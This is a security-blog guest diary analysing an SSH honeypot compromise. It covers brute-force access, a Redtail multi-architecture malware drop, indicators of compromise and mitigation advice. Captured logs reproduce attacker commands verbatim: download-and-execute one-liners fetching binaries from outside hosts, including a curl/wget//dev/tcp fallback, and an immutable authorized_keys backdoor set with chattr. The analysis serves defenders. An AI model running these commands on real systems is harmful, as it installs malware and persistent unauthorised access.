Security

[Guest Diary] Anatomy of a Linux SSH Honeypot Attack: Detailed Analysis of Captured Malware, (Fri, Jun 13th)

Leave a comment
This post was originally published on this site

[This is a Guest Diary by Michal Ambrozkiewicz, an ISC intern as part of the SANS.edu Bachelor's Degree in Applied Cybersecurity (BACS) program [1].]

On April 29, 2025, my Raspberry Pi-based Cowrie SSH honeypot captured a sophisticated attack campaign targeting Linux systems. This wasn't just another automated scanner – the logs reveal a multi-stage attack involving SSH brute forcing, backdoor installation, and deployment of architecture-specific malware. In this post, I'll walk through the entire attack chain, from initial access to persistence mechanisms, providing both technical details for security professionals and explanations accessible to those newer to cybersecurity. By understanding how these attacks work in detail, we can better protect our systems from similar threats.

Welcome to my digital fishing expedition! I transformed a modest Raspberry Pi 5 into an irresistible target for cyber attackers by deploying Cowrie – an advanced SSH honeypot that mimics vulnerable systems while secretly documenting every keystroke and technique employed by unsuspecting intruders. Unlike simple packet logging, Cowrie creates an interactive playground where attackers believe they've gained access to a poorly secured Linux system, all while their tactics, tools, and techniques are meticulously recorded for our analysis. This sophisticated deception environment provides a fascinating window into the current attack landscape without putting any production systems at risk.

This approach gives us a front-row seat to the cybersecurity battlefield, where we can observe real-world adversaries' behaviors in their natural habitat rather than merely theorizing about potential attack vectors. The data collected here represents authentic attack techniques being deployed against systems worldwide at this very moment.

My setup includes:

  • Raspberry Pi 5 running a customized Debian-based distribution
  • Cowrie SSH honeypot configured to listen on port 2222 (forwarded to appear as port 22)
  • JSON-based logging of all interactions
  • Exposed public IP address with minimal firewall restrictions


Figure 1: Network diagram of a honeypot.

 

The honeypot was configured to allow seemingly successful login attempts with weak credentials, giving attackers the impression they had gained access to a poorly secured Linux system [2].


Figure 2: Status checking on honeypot functionality showing all systems working.

 

Initial Access: The Hunt for Credentials

The honeypot logs reveal numerous SSH brute force attempts throughout April 29th. The attackers used various source IPs but similar attack patterns, suggesting a coordinated campaign or use of compromised infrastructure. The successful compromise occurred at 17:25:32 UTC from IP address %%ip:196.251.70.219%%. The attacker's SSH client identified as "SSH-2.0-Go", indicating the use of a Go-based scanning/exploitation tool. This is consistent with automated attack frameworks commonly used in large-scale campaigns.

The attacker successfully authenticated using:

  • Username: root
  • Password: abcd123456!

This highlights a critical security issue many systems face – the use of simple, easily guessable passwords. Even in 2025, default or weak credentials remain one of the primary vectors for initial compromise.

cat /home/raspberry/attack_timeline.txt | grep -A 5 "login.success" | grep "196.251.70.219"
2025-04-29T17:25:32.830913Z 196.251.70.219 cowrie.session.connect
2025-04-29T17:25:32.831335Z 196.251.70.219 cowrie.client.version
2025-04-29T17:25:32.857270Z 196.251.70.219 cowrie.client.kex
2025-04-29T17:25:33.137854Z 196.251.70.219 cowrie.login.success
2025-04-29T17:25:48.681675Z 196.251.70.219 cowrie.session.params
2025-04-29T17:25:48.682372Z 196.251.70.219 cowrie.command.input
2025-04-29T17:25:48.715791Z 196.251.70.219 cowrie.session.file_download
2025-04-29T17:25:48.717741Z 196.251.70.219 cowrie.session.file_upload
2025-04-29T17:25:48.719845Z 196.251.70.219 cowrie.session.file_upload

 

Establishing Persistence

Within seconds of gaining access, the attacker executed a series of commands to establish persistence. The attack was highly automated, with all actions occurring within a 15-second timeframe, suggesting a well rehearsed and scripted approach.

The main attack session began with the attacker uploading multiple files via SFTP:


Figure 3: Uploads observation.

 

The most significant persistence mechanism was the installation of an SSH key into the authorized_keys file:

mkdir -p ~/.ssh
chattr -ia ~/.ssh/authorized_keys
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK2 
16q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv6 
6I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96h 
u1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWp 
O2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtBEk9rGpgBnJ1hcEUs 
lEf/zevIcX8+6H7kUMRr rsa-key-20230629" > ~/.ssh/authorized_keys
chattr +ai ~/.ssh/authorized_keys

 

The chattr +ai command is particularly notable – it sets the "append-only" and "immutable" attributes on the authorized_keys file, making it difficult for system administrators or security tools to modify or remove the backdoor without specialized knowledge. 

The attacker followed this by checking system information with uname -a and sending a confirmation message back to their infrastructure with the encoded string x61x75x74x68x5Fx6Fx6Bx0A which decodes to "auth_ok" – signaling successful compromise.

{"eventid":"cowrie.command.input","input":"chmod +x clean.sh; sh clean.sh; rm -rf clean.sh; craspberry@pi5:~ $ echo -e "x61x75x74x68x5Fx6Fx6Bx0A"auth_ok

 

Malware Analysis: Hunting for Architecture-Specific Payloads

The attacker came prepared with multiple malware variants tailored for different CPU architectures, ensuring successful infection regardless of the target system:

  1. redtail.arm7 – Targeting older ARM-based devices (SHA-256: 2ef6bb55a79d81fbda6d574456a8c187f610c5ae2ddca38e32cf7cc50912b0bf) [3]
  2. redtail.arm8 – For newer ARM64 architecture (SHA-256: fc8730fbe87bcbdc093a1ffbcb0028ccb4c24638e55d13fd853b07574f4cbe4a) [4]
  3. redtail.i686 – For 32-bit x86 systems (SHA-256: 7780e72f7dea978946d4615c8db1b239d3e2c742cfc8be2934006b1fd6071110) [5]
  4. redtail.x86_64 – For 64-bit x86 systems (SHA-256: b6ee8e08f1d4992ca85770e6883c1d2206ebbaf42f99d99aba0e26278de8bffb) [6]

Beyond the SSH compromise, the logs also reveal alternative infection attempts targeting other vulnerable systems. In a separate session, the attacker attempted to download and execute binaries from external infrastructure:

cd /tmp
wget 209.141.34[.]106/PangaKenya/KKveTTgaAAsecNNaaaa.x86_64
chmod +x KKveTTgaAAsecNNaaaa.x86_64
./KKveTTgaAAsecNNaaaa.x86_64
rm -rf KKveTTgaAAsecNNaaaa.x86_64

 

This "download, execute, delete" pattern is a common technique to avoid leaving malicious files on disk for security tools to detect. The logs also show a more complex fallback mechanism attempting to download malware through three different methods (curl, wget, and direct TCP socket) in case one fails:

nohup $SHELL -c "curl http://202.55.82[.]250:60140/linux -o /tmp/mEpGt06b5j; 
if [ ! -f /tmp/mEpGt06b5j ]; then 
  wget http://202.55.82[.]250:60140/linux -O /tmp/mEpGt06b5j; 
fi; 
if [ ! -f /tmp/mEpGt06b5j ]; then 
  exec 6<>/dev/tcp/202.55.82.250/60140 && 
  echo -n 'GET /linux' >&6 && 
  cat 0<&6 > /tmp/mEpGt06b5j; 
  chmod +x /tmp/mEpGt06b5j && 
  /tmp/mEpGt06b5j [REDACTED ENCODED PARAMETERS];
fi;" &

 

The long encoded string included after the binary execution contains what appears to be configuration data or command and control information.

{
 "persistence_mechanism": {
 "method": "SSH authorized key",
 "key": "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1
GPK216q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscV
xegv66I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBY
hol96hu1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6
FieWpO2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtBEk9rGpgBnJ1
hcEUslEf/zevIcX8+6H7kUMRr rsa-key-20230629",
 "key_comment": "rsa-key-20230629",
 "fingerprint": "SHA256:78gkKoLYeUW62etRipAiAw2jImcwCMnvC5BO9+3mOtY",
 "protection": "chattr +ai (make file immutable)"
 },
 "command_sequence": "chmod +x clean.sh; sh clean.sh; rm -rf clean.sh; chmod +x setu
p.sh; sh setup.sh; rm -rf setup.sh; mkdir -p ~/.ssh; chattr -ia ~/.ssh/authorized_keys; echo
"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0
q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5y
uZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1Gt
hAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF
6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtBEk9rGpgBnJ1hcEUslEf/z
evIcX8+6H7kUMRr rsa-key-20230629" > ~/.ssh/authorized_keys; chattr +ai ~/.ssh/authori
zed_keys; uname -a; echo -e "x61x75x74x68x5Fx6Fx6Bx0A";"
 },

 "additional_malware_downloads": [
 {
 "timestamp": "2025-04-29T07:24:22.084908Z",
 "attacker_ip": "176.65.148.181",
 "malware_source": "209.141.34.106",
 "malware_path": "/PangaKenya/",
 "files": [
 {
 "filename": "KKveTTgaAAsecNNaaaa.x86_64",
 "sha256": "811cd6ebeb9e2b7438ad9d7c382db13c1c04b7d520495261093af51797f5
d4cc"
 },
 {
 "filename": "KKveTTgaAAsecNNaaaa.x86",
 "sha256": "9ac2e308b0b30354575bba88169283fa7439d34937a148ccb390bcec3c
6e296b"
 }
 ],
 "command": "cd /tmp; wget 209.141.34.106/PangaKenya/KKveTTgaAAsecNNaaaa.x86_6
4; chmod +x KKveTTgaAAsecNNaaaa.x86_64; ./KKveTTgaAAsecNNaaaa.x86_64 ; rm -rf K
KveTTgaAAsecNNaaaa.x86_64; wget 209.141.34.106/PangaKenya/KKveTTgaAAsecNNaaaa.
x86; chmod +x KKveTTgaAAsecNNaaaa.x86; ./KKveTTgaAAsecNNaaaa.x86 ; rm -rf KKveT
TgaAAsecNNaaaa.x86"
 },
 {
 "timestamp": "2025-04-29T09:43:28.358260Z",
 "attacker_ip": "47.236.58.21",
 "malware_source": "202.55.82.250:60140",
 "malware_path": "/linux",
 "destination": "/tmp/mEpGt06b5j",
 "download_mechanism": "Multiple fallbacks: curl ? wget ? direct socket",
 "additional_actions": [
 "Creates /tmp/.opass with password '12345678'",
 "Executes with encoded command line parameters"
 ],
 "command_excerpt": "nohup $SHELL -c "curl http://202.55.82.250:60140/linux -o /tm
p/mEpGt06b5j; if [ ! -f /tmp/mEpGt06b5j ]; then wget http://202.55.82.250:60140/linux -O /
tmp/mEpGt06b5j; fi; if [ ! -f /tmp/mEpGt06b5j ]; then exec 6<>/dev/tcp/202.55.82.250/601
40 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/mEpGt06b5j ; chmod +x /tmp/mEpGt0
6b5j && /tmp/mEpGt06b5j CSKwgLxYG+KdmZqF+BdTqIG0M3R0..."
 }
 ],

 "attack_campaign": {
 "pattern": "Widespread SSH key installation across many IP addresses",
 "common_actions": [
 "ssh key installation",
 "checking crontab entries",
 "file immutability via chattr",
 "removal of attack artifacts"
 ],
 "target": "Linux systems across multiple architectures"
 }

 

Persistence Mechanisms: Staying Under the Radar

In addition to the SSH key backdoor, the attackers employed multiple techniques to maintain access and resist removal attempts:

1. File Attribute Manipulation

The logs show consistent use of the chattr command to set immutable flags on files:

chattr +ai ~/.ssh/authorized_keys

 

This prevents the file from being modified or deleted through normal means, complicating remediation efforts.

2. Crontab Inspection

The attackers routinely checked for scheduled tasks using crontab -l , likely to:

  • Identify any security monitoring tools that might detect their presence
  • Understand system maintenance schedules
  • Find opportunities to add their own persistence mechanisms

The logs show over 40 different sessions executing this command, indicating a systematic approach to reconnoitering compromised systems.

crontab -l
# Session 7332db45b083 (135.148.27.57) at 2025-04-29T01:36:43
# Session 43583c947eab (45.55.187.1) at 2025-04-29T02:10:45
# Session e2cfd359b841 (81.19.140.78) at 2025-04-29T03:00:37
# Session 913f4c51570e (120.133.83.199) at 2025-04-29T03:34:14
# Session 374ae6b1e98c (77.105.181.82) at 2025-04-29T03:47:04

 

3. Targeting Multiple Architectures

By preparing malware for ARM7, ARM8, i686, and x86_64 architectures, the attackers ensured their ability to maintain presence across heterogeneous environments – from small IoT devices to server infrastructure.

4. Cleanup Operations

The attack chain included execution of a script named clean.sh which likely removed evidence of the intrusion from system logs and temporary directories. This "anti-forensics" approach makes detection more difficult for security teams.

 {
 "eventid": "cowrie.session.file_upload",
 "filename": "clean.sh",
 "outfile": "var/lib/cowrie/downloads/d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6
fb3ab5388d2c5bc6a98e",
 "shasum": "d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98
e",
 "message": "SFTP Uploaded file "clean.sh" to var/lib/cowrie/downloads/d46555af1173d
22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e",
 "sensor": "",
 "timestamp": "2025-04-29T17:25:48.717741Z",
 "src_ip": "196.251.70.219",
 "session": "90db1182d123"
 },
 {
 "eventid": "cowrie.command.input",
 "input": "chmod +x clean.sh; sh clean.sh; rm -rf clean.sh; chmod +x setup.sh; sh setup.s
h; rm -rf setup.sh; mkdir -p ~/.ssh; chattr -ia ~/.ssh/authorized_keys; echo "ssh-rsa AAAA
B3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7Ag
vfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPX
xg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrv
aRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSm
dw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtBEk9rGpgBnJ1hcEUslEf/zevIcX8+6H7kUM
Rr rsa-key-20230629" > ~/.ssh/authorized_keys; chattr +ai ~/.ssh/authorized_keys; unam
e -a; echo -e "x61x75x74x68x5Fx6Fx6Bx0A"; ",
 "message": "CMD: chmod +x clean.sh; sh clean.sh; rm -rf clean.sh; chmod +x setup.sh;
sh setup.sh; rm -rf setup.sh; mkdir -p ~/.ssh; chattr -ia ~/.ssh/authorized_keys; echo "sshrsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7ne
NVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEa
DAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMt
PAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfd
mHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtBEk9rGpgBnJ1hcEUslEf/zevIcX
8+6H7kUMRr rsa-key-20230629" > ~/.ssh/authorized_keys; chattr +ai ~/.ssh/authorized_
keys; uname -a; echo -e "x61x75x74x68x5Fx6Fx6Bx0A"; ",
 "sensor": "",
 "timestamp": "2025-04-29T17:25:48.682372Z",
 "src_ip": "196.251.70.219",
 "session": "90db1182d123"
 }
]

 

[
 {
 "event_type": "command_execution",
 "timestamp": "2025-04-29T17:25:48.682372Z",
 "src_ip": "196.251.70.219",
 "session": "90db1182d123",
 "command_sequence": [
 {
 "phase": "cleanup_script_execution",
 "commands": [
 "chmod +x clean.sh",
 "sh clean.sh",
 "rm -rf clean.sh"
 ]
 },
 {
 "phase": "malware_installation",
 "commands": [
 "chmod +x setup.sh",
 "sh setup.sh",
 "rm -rf setup.sh"
 ]
 },
 {
 "phase": "persistence_establishment",
 "commands": [
 "mkdir -p ~/.ssh",
 "chattr -ia ~/.ssh/authorized_keys",
 "echo "ssh-rsa AAAAB3NzaC1yc2EAAAA[...truncated...]kUMRr rsa-key-20230629"
> ~/.ssh/authorized_keys",
 "chattr +ai ~/.ssh/authorized_keys"
 ]
 },
 {
 "phase": "system_identification",
 "commands": [
 "uname -a"
 ]
 },
 {
 "phase": "callback_confirmation",
 "commands": [
 "echo -e "x61x75x74x68x5Fx6Fx6Bx0A""
 ],
 "decoded_message": "auth_ok"
 }
 ]
 },
 {
 "event_type": "file_download",
 "duplicate": true,
 "outfile": "var/lib/cowrie/downloads/8a68d1c08ea31250063f70b1ccb5051db1f7ab6e17d4
6e9dd3cc292b9849878b",
 "shasum": "8a68d1c08ea31250063f70b1ccb5051db1f7ab6e17d46e9dd3cc292b9849878
b"
 }
]

 

chmod +x clean.sh; sh clean.sh; rm -rf clean.sh

 

[
 {
 "eventid": "cowrie.command.input",
 "input": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
 "message": "CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh",
 "sensor": "",
 "timestamp": "2025-04-29T01:36:35.757277Z",
 "src_ip": "135.148.27.57",
 "session": "7332db45b083"
 },
 {
 "eventid": "cowrie.command.input",
 "input": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
 "message": "CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh",
 "sensor": "",
 "timestamp": "2025-04-29T02:10:37.895619Z",
 "src_ip": "45.55.187.1",
 "session": "43583c947eab"
 },
 {
 "eventid": "cowrie.command.input",
 "input": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
 "message": "CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh",
 "sensor": "",
 "timestamp": "2025-04-29T03:00:30.746579Z",
 "src_ip": "81.19.140.78",
 "session": "e2cfd359b841"
 },
 {
 "eventid": "cowrie.command.input",
 "input": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
 "message": "CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh",
 "sensor": "",
 "timestamp": "2025-04-29T03:34:04.080390Z",
 "src_ip": "120.133.83.199",
 "session": "913f4c51570e"
 },
 {
 "eventid": "cowrie.command.input",
 "input": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
 "message": "CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh",
 "sensor": "",
 "timestamp": "2025-04-29T03:46:59.162406Z",
 "src_ip": "77.105.181.82",
 "session": "374ae6b1e98c"
 }
]

 

Indicators of Compromise (IOCs)

IP Addresses
 

IP Address Role Timestamp(s) Activity Geographic Region
%%ip:196.251.70.219%% Primary Attacker 2025-04-29T17:25:32Z Successful compromise, multi-architecture malware upload South Africa
%%ip:209.141.34.106%% Malware Host 2025-04-29T07:24:22Z Hosting "PangaKenya" malware variants United States
%%ip:202.55.82.250%% Secondary C2 2025-04-29T09:43:28Z Command & control server on port 60140 with fallback mechanisms Japan
%%ip:176.65.148.181%% Malware Execution 2025-04-29T07:24:22Z Downloaded and executed "PangaKenya" malware Russia
%%ip:47.236.58.21%% Advanced Attacker 2025-04-29T09:43:28Z Complex malware download China
%%ip:81.19.140.78%% Campaign Node 2025-04-29T03:00:30Z – 
2025-04-29T04:22:42Z		 Multiple SSH key installation attempts Netherlands
%%ip:213.155.195.169%% Campaign Node 2025-04-29T05:35:33Z –
2025-04-29T05:56:56Z		 Multiple SSH key installation attempts Poland
%%ip:203.239.31.150%% Campaign Node 2025-04-29T05:40:24Z –
2025-04-29T07:19:11Z		 Multiple SSH key installation attempts South Korea
%%ip:67.10.184.83%% Campaign Node 2025-04-29T11:05:53Z –
2025-04-29T14:03:12Z		 Multiple SSH key installation attempts United States
%%ip:135.148.27.57%% Campaign Node 2025-04-29T01:36:35Z SSH key installation attempt Canada
%%ip:45.55.187.1%% Campaign Node 2025-04-29T02:10:37Z SSH key installation attempt United States
%%ip:120.133.83.199%% Campaign Node 2025-04-29T03:34:04Z SSH key installation attempt China
%%ip:77.105.181.82%% Campaign Node 2025-04-29T03:46:59Z SSH key installation attempt Russia
%%ip:154.219.99.245%% Campaign Node 2025-04-29T04:07:54Z SSH key installation attempt Poland
%%ip:176.109.0.30%% Campaign Node 2025-04-29T04:12:27Z SSH key installation attempt Russia
%%ip:167.99.128.177%% Campaign Node 2025-04-29T04:38:22Z SSH key installation attempt United Kingdom
%%ip:211.253.10.96%% Campaign Node 2025-04-29T04:48:26Z SSH key installation attempt South Korea
%%ip:101.126.90.24%% Campaign Node 2025-04-29T04:57:37Z SSH key installation attempt Japan
%%ip:138.197.116.43%% Campaign Node 2025-04-29T05:21:44Z SSH key installation attempt Canada
%%ip:14.103.123.75%% Campaign Node 2025-04-29T09:12:16Z SSH key installation attempt China
%%ip:182.40.195.233%% Campaign Node 2025-04-29T09:23:54Z SSH key installation attempt China
%%ip:117.9.170.239%% Campaign Node 2025-04-29T10:06:41Z SSH key installation attempt China

Fiture 4:Visualisation showing repeated access attempts and persistence mechanisms.

 

Attack Infrastructure Analysis

The table reveals several key insights:

  1. Global Coordination: The attack campaign spans at least 9 countries across Asia, Europe, North America, and Africa.
  2. Infrastructure Hierarchy:
    • Primary infrastructure for sophisticated attacks (3 key IPs)
    • Distributed secondary nodes attempting simpler SSH key installations (19+ IPs)
  3. Temporal Pattern: Active operation throughout April 29, 2025, suggesting automation.
  4. Geographic Clustering:
    • Asian cluster: China, Japan, South Korea (7+ IPs)
    • European cluster: Russia, Poland, UK, Netherlands (5+ IPs)
    • North American cluster: US, Canada (4+ IPs)
    • African presence: South Africa (1 IP – primary attacker)

Key Infrastructure Providers

  1. Primary Malware Distribution Server (%%ip:209.141.34.106%%):
    • Hosted by FranTech Solutions – a US-based hosting provider
    • Located in Las Vegas, Nevada, United States
    • Operating under AS53667
    • Known for offering bulletproof hosting services that are often used by threat actors
  2. Secondary C2 Server (%%ip:202.55.82.250%%):
    • Located in Asia
    • Used for distributing the "linux" binary malware with fallback download methods
  3. Attacker Origin (%%ip:196.251.70.219%%):
    • South African IP address
    • Used for the most sophisticated attack that deployed multi-architecture binaries
  4. Operational Significance: The use of globally distributed IPs for similar attack patterns strongly suggests a sophisticated botnet operation rather than isolated threat actors.

This comprehensive geographic distribution indicates the attack campaign likely utilized compromised infrastructure or proxy networks to obfuscate its true origin while conducting a coordinated global attack campaign.

Malware File Hashes (SHA-256)

  • 811cd6ebeb9e2b7438ad9d7c382db13c1c04b7d520495261093af51797f5d4cc – KKveTTgaAAsecNNaaaa.x86_64
  • 9ac2e308b0b30354575bba88169283fa7439d34937a148ccb390bcec3c6e296b – KKveTTgaAAsecNNaaaa.x86
  • 2ef6bb55a79d81fbda6d574456a8c187f610c5ae2ddca38e32cf7cc50912b0bf – redtail.arm7
  • fc8730fbe87bcbdc093a1ffbcb0028ccb4c24638e55d13fd853b07574f4cbe4a – redtail.arm8
  • 7780e72f7dea978946d4615c8db1b239d3e2c742cfc8be2934006b1fd6071110 – redtail.i686
  • b6ee8e08f1d4992ca85770e6883c1d2206ebbaf42f99d99aba0e26278de8bffb – redtail.x86_64
  • d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e – clean.sh
  • 3b15778595cef00d1a51035dd4fd65e6be97e73544cb1899f40aec4aaa0445ae – setup.sh

SSH Backdoor Information

  • Key fingerprint: 2048 SHA256:78gkKoLYeUW62etRipAiAw2jImcwCMnvC5BO9+3mOtY
  • Key comment: rsa-key-20230629

Malicious Commands

  • chattr -ia ~/.ssh/authorized_keys
  • chattr +ai ~/.ssh/authorized_keys
  • Creation of file /tmp/.opass with password content

HASSH Fingerprint

0a07365cc01fa9fc82608ba4019af499 (SSH-2.0-Go client)

 

{
 "eventid": "cowrie.command.input",
 "input": "chmod +x clean.sh; sh clean.sh; rm -rf clean.sh; chmod +x setup.sh; sh setup.s
h; rm -rf setup.sh; mkdir -p ~/.ssh; chattr -ia ~/.ssh/authorized_keys; echo "ssh-rsa AAAA
B3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7Ag
vfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPX
xg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrv
aRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSm
dw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtBEk9rGpgBnJ1hcEUslEf/zevIcX8+6H7kUM
Rr rsa-key-20230629" > ~/.ssh/authorized_keys; chattr +ai ~/.ssh/authorized_keys; unam
e -a; echo -e "x61x75x74x68x5Fx6Fx6Bx0A"; ",
 "message": "CMD: chmod +x clean.sh; sh clean.sh; rm -rf clean.sh; chmod +x setup.sh; s
h setup.sh; rm -rf setup.sh; mkdir -p ~/.ssh; chattr -ia ~/.ssh/authorized_keys; echo "ssh-r
sa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7ne
NVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEa
DAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMt
PAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfd
mHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtBEk9rGpgBnJ1hcEUslEf/zevIcX
8+6H7kUMRr rsa-key-20230629" > ~/.ssh/authorized_keys; chattr +ai ~/.ssh/authorized_
keys; uname -a; echo -e "x61x75x74x68x5Fx6Fx6Bx0A"; ",
 "sensor": "",
 "timestamp": "2025-04-29T17:25:48.682372Z",
 "src_ip": "196.251.70.219",
 "session": "90db1182d123"
}

{
 "eventid": "cowrie.client.kex",
 "hassh": "0a07365cc01fa9fc82608ba4019af499",
 "hasshAlgorithms": "curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nist
p256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellm
an-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,ae
s256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes25
6-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2
-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none",
 "kexAlgs": [
 "curve25519-sha256",
 "curve25519-sha256@libssh.org",
 "ecdh-sha2-nistp256",
 "ecdh-sha2-nistp384",
 "ecdh-sha2-nistp521",
 "diffie-hellman-group14-sha256",
 "diffie-hellman-group14-sha1",
 "ext-info-c",
 "kex-strict-c-v00@openssh.com"
 ],
 "keyAlgs": [
 "rsa-sha2-256-cert-v01@openssh.com",
 "rsa-sha2-512-cert-v01@openssh.com",
 "ssh-rsa-cert-v01@openssh.com",
 "ssh-dss-cert-v01@openssh.com",
 "ecdsa-sha2-nistp256-cert-v01@openssh.com",
 "ecdsa-sha2-nistp384-cert-v01@openssh.com",
 "ecdsa-sha2-nistp521-cert-v01@openssh.com",
 "ssh-ed25519-cert-v01@openssh.com",
 "ecdsa-sha2-nistp256",
 "ecdsa-sha2-nistp384",
 "ecdsa-sha2-nistp521",
 "rsa-sha2-256",
 "rsa-sha2-512",
 "ssh-rsa",
 "ssh-dss",
 "ssh-ed25519"
 ],
 "encCS": [
 "aes128-gcm@openssh.com",
 "aes256-gcm@openssh.com",
 "chacha20-poly1305@openssh.com",
 "aes128-ctr",
 "aes192-ctr",
 "aes256-ctr"
 ],
 "macCS": [
 "hmac-sha2-256-etm@openssh.com",
 "hmac-sha2-512-etm@openssh.com",
 "hmac-sha2-256",
 "hmac-sha2-512",
 "hmac-sha1",
 "hmac-sha1-96"
 ],
 "compCS": [
 "none"
 ],
 "langCS": [
 ""
 ],
 "message": "SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499",
 "sensor": "",
 "timestamp": "2025-04-29T17:25:32.857270Z",
 "src_ip": "196.251.70.219",
 "session": "90db1182d123"
}
===============================================
HASSH Threat Intelligence: 0a07365cc01fa9fc82608ba4019af499
===============================================
Client: SSH-2.0-Go
Algorithm suite: curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,
ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-gr
oup14-sha1,ext-info-c,kex-strict-c-v00@openssh.com
Encryption algorithms: aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-
poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr
Detected attack patterns: Automated brute force, credential stuffing
Known threat actors: Associated with mass scanning botnets
Source IP: 196.251.70.219 (South Africa)
===============================================

 

Mitigation Recommendations

Based on the attack techniques observed, here are key recommendations to protect your systems:

Secure Authentication

  1. Disable password-based SSH authentication in favor of key-based authentication
  2. Implement strong password policies if password authentication must be enabled
  3. Consider implementing SSH certificate authentication for enhanced security
  4. Implement multi-factor authentication where possible

Network Security

  1. Implement IP allowlisting for administrative access when feasible
  2. Use a properly configured firewall to limit SSH access to known networks
  3. Consider using a VPN as an additional protection layer for remote access
  4. Implement network segmentation to contain potential breaches

System Hardening

  1. Regularly update and patch systems
  2. Remove or disable unnecessary services and software
  3. Implement the principle of least privilege for all accounts
  4. Use intrusion detection/prevention systems to identify suspicious activity

Monitoring and Detection

  1. Monitor for unauthorized SSH keys in authorized_keys files
